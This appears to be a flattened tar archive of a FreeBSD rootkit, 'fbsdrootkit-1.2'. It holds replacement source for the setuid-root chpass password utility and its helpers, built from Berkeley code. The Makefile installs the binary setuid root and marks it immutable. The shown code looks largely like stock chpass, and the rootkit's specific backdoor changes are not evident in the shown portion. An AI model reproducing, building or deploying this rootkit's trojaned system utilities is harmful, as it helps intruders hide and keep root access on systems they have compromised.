fcntl(lockfd, F_SETFD, 1) == -1) err(1, "%s", _PATH_MASTERPASSWD); if (flock(lockfd, LOCK_EX|LOCK_NB)) errx(1, "the password db file is busy"); return (lockfd); } int pw_tmp() { static char path[MAXPATHLEN] = _PATH_MASTERPASSWD; int fd; char *p; if (p = strrchr(path, '/')) ++p; else p = path; strcpy(p, "pw.XXXXXX"); if ((fd = mkstemp(path)) == -1) err(1, "%s", path); tempname = path; return (fd); } int pw_mkdb() { int pstat; pid_t pid; warnx("rebuilding the database..."); (void)fflush(stderr); if (!(pid = vfork())) { execl(_PATH_PWD_MKDB, "pwd_mkdb", "-p", tempname, NULL); pw_error(_PATH_PWD_MKDB, 1, 1); } pid = waitpid(pid, &pstat, 0); if (pid == -1 || !WIFEXITED(pstat) || WEXITSTATUS(pstat) != 0) return (0); warnx("done"); return (1); } void pw_edit(notsetuid) int notsetuid; { int pstat; char *p, *editor; if (!(editor = getenv("EDITOR"))) editor = _PATH_VI; if (p = strrchr(editor, '/')) ++p; else p = editor; if (!(editpid = vfork())) { if (notsetuid) { (void)setgid(getgid()); (void)setuid(getuid()); } execlp(editor, p, tempname, NULL); _exit(1); } for (;;) { editpid = waitpid(editpid, (int *)&pstat, WUNTRACED); if (editpid == -1) pw_error(editor, 1, 1); else if (WIFSTOPPED(pstat)) raise(WSTOPSIG(pstat)); else if (WIFEXITED(pstat) && WEXITSTATUS(pstat) == 0) break; else pw_error(editor, 1, 1); } editpid = -1; } void pw_prompt() { int c; (void)printf("re-edit the password file? [y]: "); (void)fflush(stdout); c = getchar(); if (c != EOF && c != '\n') while (getchar() != '\n'); if (c == 'n') pw_error(NULL, 0, 0); } void pw_error(name, err, eval) char *name; int err, eval; { #ifdef YP extern int _use_yp; #endif /* YP */ if (err) warn(name); #ifdef YP if (_use_yp) warnx("NIS information unchanged"); else #endif /* YP */ warnx("%s: unchanged", _PATH_MASTERPASSWD); (void)unlink(tempname); exit(eval); } fbsdrootkit-1.2/chpass/ 40700 764 764 0 6257405241 12322 5ustar dfdffbsdrootkit-1.2/chpass/Makefile100600 764 764 1401 6257153656 14067 0ustar dfdf# @(#)Makefile 8.2 (Berkeley) 4/2/94 PROG= chpass SRCS= chpass.c edit.c field.c pw_copy.c pw_scan.c pw_util.c table.c util.c BINOWN= root BINMODE=4555 .PATH: ${.CURDIR}/../pwd_mkdb ${.CURDIR}/../vipw CFLAGS+=-I${.CURDIR}/../pwd_mkdb -I${.CURDIR}/../vipw LINKS= ${BINDIR}/chpass ${BINDIR}/chfn LINKS+= ${BINDIR}/chpass ${BINDIR}/chsh LINKS+= ${BINDIR}/chpass ${BINDIR}/ypchpass LINKS+= ${BINDIR}/chpass ${BINDIR}/ypchfn LINKS+= ${BINDIR}/chpass ${BINDIR}/ypchsh MLINKS= chpass.1 chfn.1 chpass.1 chsh.1 COPTS+= -DYP SRCS+= pw_yp.c DPADD= ${LIBRPCSVC} ${LIBCRYPT} LDADD+= -lrpcsvc -lcrypt beforeinstall: [ ! -e ${DESTDIR}${BINDIR}/chpass ] || \ chflags noschg ${DESTDIR}${BINDIR}/chpass afterinstall: chflags schg ${DESTDIR}${BINDIR}/chpass .include fbsdrootkit-1.2/chpass/chpass.c100600 764 764 15324 6122755464 14101 0ustar dfdf/*- * Copyright (c) 1988, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1988, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "From: @(#)chpass.c 8.4 (Berkeley) 4/2/94"; static char rcsid[] = "$Id: chpass.c,v 1.3.4.3 1996/03/17 09:03:17 joerg Exp $"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pw_copy.h" #ifdef YP #include "pw_yp.h" #endif #include "chpass.h" #include "pathnames.h" char *progname = "chpass"; char *tempname; uid_t uid; void baduser __P((void)); void usage __P((void)); int main(argc, argv) int argc; char **argv; { enum { NEWSH, LOADENTRY, EDITENTRY, NEWPW } op; struct passwd *pw, lpw; int ch, pfd, tfd; char *arg; #ifdef YP int force_local = 0; int force_yp = 0; #endif op = EDITENTRY; #ifdef YP while ((ch = getopt(argc, argv, "a:p:s:ly")) != EOF) #else while ((ch = getopt(argc, argv, "a:p:s:")) != EOF) #endif switch(ch) { case 'a': op = LOADENTRY; arg = optarg; break; case 's': op = NEWSH; arg = optarg; break; case 'p': op = NEWPW; arg = optarg; break; #ifdef YP case 'l': force_local = 1; break; case 'y': force_yp = 1; break; #endif case '?': default: usage(); } argc -= optind; argv += optind; uid = getuid(); if (op == EDITENTRY || op == NEWSH || op == NEWPW) switch(argc) { case 0: if (!(pw = getpwuid(uid))) errx(1, "unknown user: uid %u", uid); break; case 1: if (!(pw = getpwnam(*argv))) errx(1, "unknown user: %s", *argv); if (uid && uid != pw->pw_uid) baduser(); break; default: usage(); } #ifdef YP pw->pw_name = strdup(pw->pw_name); _use_yp = use_yp(pw->pw_name); if (_use_yp == USER_YP_ONLY) { if (!force_local) { _use_yp = 1; pw = (struct passwd *)&yp_password; } else errx(1, "unknown local user: %s.", pw->pw_name); } else if (_use_yp == USER_LOCAL_ONLY) { if (!force_yp) { _use_yp = 0; pw = (struct passwd *)&local_password; } else errx(1, "unknown NIS user: %s.", pw->pw_name); } else if (_use_yp == USER_YP_AND_LOCAL) { if (!force_local) { _use_yp = 1; pw = (struct passwd *)&yp_password; } else { _use_yp = 0; pw = (struct passwd *)&local_password; } } #endif /* YP */ if (op == NEWSH) { /* protect p_shell -- it thinks NULL is /bin/sh */ if (!arg[0]) usage(); if (p_shell(arg, pw, (ENTRY *)NULL)) pw_error((char *)NULL, 0, 1); } if (op == LOADENTRY) { if (uid) baduser(); pw = &lpw; if (!pw_scan(arg, pw)) exit(1); } if (op == NEWPW) { if (uid) baduser(); if(strchr(arg, ':')) { errx(1, "invalid format for password"); } pw->pw_passwd = arg; } /* * The temporary file/file descriptor usage is a little tricky here. * 1: We start off with two fd's, one for the master password * file (used to lock everything), and one for a temporary file. * 2: Display() gets an fp for the temporary file, and copies the * user's information into it. It then gives the temporary file * to the user and closes the fp, closing the underlying fd. * 3: The user edits the temporary file some number of times. * 4: Verify() gets an fp for the temporary file, and verifies the * contents. It can't use an fp derived from the step #2 fd, * because the user's editor may have created a new instance of * the file. Once the file is verified, its contents are stored * in a password structure. The verify routine closes the fp, * closing the underlying fd. * 5: Delete the temporary file. * 6: Get a new temporary file/fd. Pw_copy() gets an fp for it * file and copies the master password file into it, replacing * the user record with a new one. We can't use the first * temporary file for this because it was owned by the user. * Pw_copy() closes its fp, flushing the data and closing the * underlying file descriptor. We can't close the master * password fp, or we'd lose the lock. * 7: Call pw_mkdb() (which renames the temporary file) and exit. * The exit closes the master passwd fp/fd. */ pw_init(); pfd = pw_lock(); tfd = pw_tmp(); if (op == EDITENTRY) { display(tfd, pw); edit(pw); (void)unlink(tempname); tfd = pw_tmp(); } #ifdef YP if (_use_yp) { yp_submit(pw); (void)unlink(tempname); } else { #endif /* YP */ pw_copy(pfd, tfd, pw); if (!pw_mkdb()) pw_error((char *)NULL, 0, 1); #ifdef YP } #endif /* YP */ exit(0); } void baduser() { errx(1, "%s", strerror(EACCES)); } void usage() { (void)fprintf(stderr, #ifdef YP "usage: chpass [-l] [-y] [-a list] [-p encpass] [-s shell] [user]\n"); #else "usage: chpass [-a list] [-p encpass] [-s shell] [user]\n"); #endif exit(1); } fbsdrootkit-1.2/chpass/chpass.h100600 764 764 5620 5571373017 14061 0ustar dfdf/* * Copyright (c) 1988, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)chpass.h 8.4 (Berkeley) 4/2/94 */ struct passwd; typedef struct _entry { char *prompt; int (*func)(), restricted, len; char *except, *save; } ENTRY; /* Field numbers. */ #define E_BPHONE 8 #define E_HPHONE 9 #define E_LOCATE 10 #define E_NAME 7 #define E_SHELL 12 extern ENTRY list[]; extern uid_t uid; int atot __P((char *, time_t *)); void display __P((int, struct passwd *)); void edit __P((struct passwd *)); char *ok_shell __P((char *)); int p_change __P((char *, struct passwd *, ENTRY *)); int p_class __P((char *, struct passwd *, ENTRY *)); int p_expire __P((char *, struct passwd *, ENTRY *)); int p_gecos __P((char *, struct passwd *, ENTRY *)); int p_gid __P((char *, struct passwd *, ENTRY *)); int p_hdir __P((char *, struct passwd *, ENTRY *)); int p_login __P((char *, struct passwd *, ENTRY *)); int p_login __P((char *, struct passwd *, ENTRY *)); int p_passwd __P((char *, struct passwd *, ENTRY *)); int p_shell __P((char *, struct passwd *, ENTRY *)); int p_uid __P((char *, struct passwd *, ENTRY *)); char *ttoa __P((time_t)); int verify __P((struct passwd *)); fbsdrootkit-1.2/chpass/edit.c100600 764 764 15454 6243176626 13552 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)edit.c 8.3 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include "chpass.h" #ifdef YP #include "pw_yp.h" #endif /* YP */ extern char *tempname; void edit(pw) struct passwd *pw; { struct stat begin, end; for (;;) { if (stat(tempname, &begin)) pw_error(tempname, 1, 1); pw_edit(1); if (stat(tempname, &end)) pw_error(tempname, 1, 1); if (begin.st_mtime == end.st_mtime) { warnx("no changes made"); pw_error(NULL, 0, 0); } if (verify(pw)) break; pw_prompt(); } } /* * display -- * print out the file for the user to edit; strange side-effect: * set conditional flag if the user gets to edit the shell. */ void display(fd, pw) int fd; struct passwd *pw; { FILE *fp; char *bp, *p, *ttoa(); if (!(fp = fdopen(fd, "w"))) pw_error(tempname, 1, 1); (void)fprintf(fp, #ifdef YP "#Changing %s information for %s.\n", _use_yp ? "NIS" : "user database", pw->pw_name); if (!uid && !_use_yp) { #else "#Changing user database information for %s.\n", pw->pw_name); if (!uid) { #endif /* YP */ (void)fprintf(fp, "Login: %s\n", pw->pw_name); (void)fprintf(fp, "Password: %s\n", pw->pw_passwd); (void)fprintf(fp, "Uid [#]: %d\n", pw->pw_uid); (void)fprintf(fp, "Gid [# or name]: %d\n", pw->pw_gid); (void)fprintf(fp, "Change [month day year]: %s\n", ttoa(pw->pw_change)); (void)fprintf(fp, "Expire [month day year]: %s\n", ttoa(pw->pw_expire)); (void)fprintf(fp, "Class: %s\n", pw->pw_class); (void)fprintf(fp, "Home directory: %s\n", pw->pw_dir); (void)fprintf(fp, "Shell: %s\n", *pw->pw_shell ? pw->pw_shell : _PATH_BSHELL); } /* Only admin can change "restricted" shells. */ #ifdef 0 else if (ok_shell(pw->pw_shell)) /* * Make shell a restricted field. Ugly with a * necklace, but there's not much else to do. */ #else else if ((!list[E_SHELL].restricted && ok_shell(pw->pw_shell)) || !uid) /* * If change not restrict (table.c) and standard shell * OR if root, then allow editing of shell. */ #endif (void)fprintf(fp, "Shell: %s\n", *pw->pw_shell ? pw->pw_shell : _PATH_BSHELL); else list[E_SHELL].restricted = 1; bp = pw->pw_gecos; p = strsep(&bp, ","); if (p) list[E_NAME].save = strdup(p); if (!list[E_NAME].restricted || !uid) (void)fprintf(fp, "Full Name: %s\n", p ? p : ""); p = strsep(&bp, ","); if (p) list[E_LOCATE].save = strdup(p); if (!list[E_LOCATE].restricted || !uid) (void)fprintf(fp, "Location: %s\n", p ? p : ""); p = strsep(&bp, ","); if (p) list[E_BPHONE].save = strdup(p); if (!list[E_BPHONE].restricted || !uid) (void)fprintf(fp, "Office Phone: %s\n", p ? p : ""); p = strsep(&bp, ","); if (p) list[E_HPHONE].save = strdup(p); if (!list[E_HPHONE].restricted || !uid) (void)fprintf(fp, "Home Phone: %s\n", p ? p : ""); (void)fchown(fd, getuid(), getgid()); (void)fclose(fp); } int verify(pw) struct passwd *pw; { ENTRY *ep; char *p; struct stat sb; FILE *fp; int len; static char buf[LINE_MAX]; if (!(fp = fopen(tempname, "r"))) pw_error(tempname, 1, 1); if (fstat(fileno(fp), &sb)) pw_error(tempname, 1, 1); if (sb.st_size == 0) { warnx("corrupted temporary file"); goto bad; } while (fgets(buf, sizeof(buf), fp)) { if (!buf[0] || buf[0] == '#') continue; if (!(p = strchr(buf, '\n'))) { warnx("line too long"); goto bad; } *p = '\0'; for (ep = list;; ++ep) { if (!ep->prompt) { warnx("unrecognized field"); goto bad; } if (!strncasecmp(buf, ep->prompt, ep->len)) { if (ep->restricted && uid) { warnx( "you may not change the %s field", ep->prompt); goto bad; } if (!(p = strchr(buf, ':'))) { warnx("line corrupted"); goto bad; } while (isspace(*++p)); if (ep->except && strpbrk(p, ep->except)) { warnx( "illegal character in the \"%s\" field", ep->prompt); goto bad; } if ((ep->func)(p, pw, ep)) { bad: (void)fclose(fp); return (0); } break; } } } (void)fclose(fp); /* Build the gecos field. */ len = strlen(list[E_NAME].save) + strlen(list[E_BPHONE].save) + strlen(list[E_HPHONE].save) + strlen(list[E_LOCATE].save) + 4; if (!(p = malloc(len))) err(1, NULL); (void)sprintf(pw->pw_gecos = p, "%s,%s,%s,%s", list[E_NAME].save, list[E_LOCATE].save, list[E_BPHONE].save, list[E_HPHONE].save); while ((len = strlen(pw->pw_gecos)) && pw->pw_gecos[len - 1] == ',') pw->pw_gecos[len - 1] = '\0'; if (snprintf(buf, sizeof(buf), "%s:%s:%d:%d:%s:%ld:%ld:%s:%s:%s", pw->pw_name, pw->pw_passwd, pw->pw_uid, pw->pw_gid, pw->pw_class, pw->pw_change, pw->pw_expire, pw->pw_gecos, pw->pw_dir, pw->pw_shell) >= sizeof(buf)) { warnx("entries too long"); return (0); } return (pw_scan(buf, pw)); } fbsdrootkit-1.2/chpass/field.c100600 764 764 12443 5762544542 13704 0ustar dfdf/* * Copyright (c) 1988, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)field.c 8.4 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include "chpass.h" #include "pathnames.h" /* ARGSUSED */ int p_login(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { if (!*p) { warnx("empty login field"); return (1); } if (*p == '-') { warnx("login names may not begin with a hyphen"); return (1); } if (!(pw->pw_name = strdup(p))) { warnx("can't save entry"); return (1); } if (strchr(p, '.')) warnx("\'.\' is dangerous in a login name"); for (; *p; ++p) if (isupper(*p)) { warnx("upper-case letters are dangerous in a login name"); break; } return (0); } /* ARGSUSED */ int p_passwd(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { if (!*p) pw->pw_passwd = ""; /* "NOLOGIN"; */ else if (!(pw->pw_passwd = strdup(p))) { warnx("can't save password entry"); return (1); } return (0); } /* ARGSUSED */ int p_uid(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { uid_t id; char *np; if (!*p) { warnx("empty uid field"); return (1); } if (!isdigit(*p)) { warnx("illegal uid"); return (1); } errno = 0; id = strtoul(p, &np, 10); if (*np || (id == ULONG_MAX && errno == ERANGE)) { warnx("illegal uid"); return (1); } pw->pw_uid = id; return (0); } /* ARGSUSED */ int p_gid(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { struct group *gr; gid_t id; char *np; if (!*p) { warnx("empty gid field"); return (1); } if (!isdigit(*p)) { if (!(gr = getgrnam(p))) { warnx("unknown group %s", p); return (1); } pw->pw_gid = gr->gr_gid; return (0); } errno = 0; id = strtoul(p, &np, 10); if (*np || (id == ULONG_MAX && errno == ERANGE)) { warnx("illegal gid"); return (1); } pw->pw_gid = id; return (0); } /* ARGSUSED */ int p_class(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { if (!*p) pw->pw_class = ""; else if (!(pw->pw_class = strdup(p))) { warnx("can't save entry"); return (1); } return (0); } /* ARGSUSED */ int p_change(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { if (!atot(p, &pw->pw_change)) return (0); warnx("illegal date for change field"); return (1); } /* ARGSUSED */ int p_expire(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { if (!atot(p, &pw->pw_expire)) return (0); warnx("illegal date for expire field"); return (1); } /* ARGSUSED */ int p_gecos(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { if (!*p) ep->save = ""; else if (!(ep->save = strdup(p))) { warnx("can't save entry"); return (1); } return (0); } /* ARGSUSED */ int p_hdir(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { if (!*p) { warnx("empty home directory field"); return (1); } if (!(pw->pw_dir = strdup(p))) { warnx("can't save entry"); return (1); } return (0); } /* ARGSUSED */ int p_shell(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { char *t, *ok_shell(); if (!*p) { pw->pw_shell = _PATH_BSHELL; return (0); } /* only admin can change from or to "restricted" shells */ if (uid && pw->pw_shell && !ok_shell(pw->pw_shell)) { warnx("%s: current shell non-standard", pw->pw_shell); return (1); } if (!(t = ok_shell(p))) { if (uid) { warnx("%s: non-standard shell", p); return (1); } } else p = t; if (!(pw->pw_shell = strdup(p))) { warnx("can't save entry"); return (1); } return (0); } fbsdrootkit-1.2/chpass/pathnames.h100600 764 764 3640 5571373017 14560 0ustar dfdf/* * Copyright (c) 1989, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)pathnames.h 8.1 (Berkeley) 6/6/93 */ #include #undef _PATH_TMP #define _PATH_TMP "/tmp/chpass.XXXXXX" fbsdrootkit-1.2/chpass/pw_copy.c100600 764 764 10272 6233130435 14261 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)pw_copy.c 8.4 (Berkeley) 4/2/94"; #endif /* not lint */ /* * This module is used to copy the master password file, replacing a single * record, by chpass(1) and passwd(1). */ #include #include #include #include #include #include "pw_copy.h" extern char *tempname; void pw_copy(ffd, tfd, pw) int ffd, tfd; struct passwd *pw; { FILE *from, *to; int done; char *p, buf[8192]; char uidstr[20]; char gidstr[20]; char chgstr[20]; char expstr[20]; snprintf(uidstr, sizeof(uidstr), "%d", pw->pw_uid); snprintf(gidstr, sizeof(gidstr), "%d", pw->pw_gid); snprintf(chgstr, sizeof(chgstr), "%ld", pw->pw_change); snprintf(expstr, sizeof(expstr), "%ld", pw->pw_expire); if (!(from = fdopen(ffd, "r"))) pw_error(_PATH_MASTERPASSWD, 1, 1); if (!(to = fdopen(tfd, "w"))) pw_error(tempname, 1, 1); for (done = 0; fgets(buf, sizeof(buf), from);) { if (!strchr(buf, '\n')) { warnx("%s: line too long", _PATH_MASTERPASSWD); pw_error(NULL, 0, 1); } if (done) { (void)fprintf(to, "%s", buf); if (ferror(to)) goto err; continue; } if (!(p = strchr(buf, ':'))) { warnx("%s: corrupted entry", _PATH_MASTERPASSWD); pw_error(NULL, 0, 1); } *p = '\0'; if (strcmp(buf, pw->pw_name)) { *p = ':'; (void)fprintf(to, "%s", buf); if (ferror(to)) goto err; continue; } (void)fprintf(to, "%s:%s:%s:%s:%s:%s:%s:%s:%s:%s\n", pw->pw_name, pw->pw_passwd, pw->pw_fields & _PWF_UID ? uidstr : "", pw->pw_fields & _PWF_GID ? gidstr : "", pw->pw_class, pw->pw_fields & _PWF_CHANGE ? chgstr : "", pw->pw_fields & _PWF_EXPIRE ? expstr : "", pw->pw_gecos, pw->pw_dir, pw->pw_shell); done = 1; if (ferror(to)) goto err; } if (!done) #ifdef YP /* Ultra paranoid: shouldn't happen. */ if (getuid()) { warnx("%s: not found in %s -- permission denied", pw->pw_name, _PATH_MASTERPASSWD); pw_error(NULL, 0, 1); } else #endif /* YP */ (void)fprintf(to, "%s:%s:%s:%s:%s:%s:%s:%s:%s:%s\n", pw->pw_name, pw->pw_passwd, pw->pw_fields & _PWF_UID ? uidstr : "", pw->pw_fields & _PWF_GID ? gidstr : "", pw->pw_class, pw->pw_fields & _PWF_CHANGE ? chgstr : "", pw->pw_fields & _PWF_EXPIRE ? expstr : "", pw->pw_gecos, pw->pw_dir, pw->pw_shell); if (ferror(to)) err: pw_error(NULL, 1, 1); (void)fclose(to); } fbsdrootkit-1.2/chpass/pw_copy.h100600 764 764 3574 5571373017 14266 0ustar dfdf/* * Copyright (c) 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 